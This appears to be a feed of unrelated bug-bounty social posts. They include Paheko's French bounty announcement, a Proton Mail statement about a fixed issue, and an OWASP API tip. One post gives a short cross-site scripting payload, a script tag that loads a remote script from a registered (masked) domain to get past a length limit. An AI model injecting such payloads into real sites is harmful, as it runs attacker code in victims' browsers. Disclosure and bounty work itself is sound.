Nous ouvrons notre programme de bug bounty pour #paheko !
Cela veut dire que si vous cherchez et trouvez des failles de sécurité dans Paheko, on peut vous récompenser. Le montant de la récompense sera fait en fonction de la sévérité de la faille. On a débloqué 1000 € pour le moment, montant amené à évoluer en fonction des retours que nous recevrons.
Un audit de sécurité partiel aura aussi lieu dans les mois qui viennent.
Avons nous, en France et en français, une plate-forme éthique de divulgation de faille cyber à but non lucratif ?
Type openbugbounty ?
Si oui, laquelle ?
@rwxrwx The issue was fixed in early July 2022. The non-web Proton Mail apps were never affected. At the time the issue was reported, we also conducted a thorough analysis of our available spam and virus filter logs and found no evidence of this attack in the wild except for the proof-of-concept reported to us. This is consistent with the attack's difficulty and the unlikely series of user actions required to make it work.
I had a field that allows html but the length is limited to 40 server side so I couldn't do much. So I registered the domain https://XXX.cc and could load a remote script from <script src=//https://xxx.cc></script> which fits in 30, and got it working nicely. #bugbounty
@kkarhan@thijs typically we can trust companies with bank stuff. It's not like they could find you if they wanted if you commited crimes. It's also good for your branding as a hacker.
If you've seen the updated OWASP API Top 10 you may be a bit confused by the "Authorisation" vulnerabilities - aren't they all just explaining the same thing? Here's a breakdown of the 4 access control issues you common see in APIs 👇👇 https://www.craft.me/s/CysIiph247P5AQ #bugbountytips#BugBounty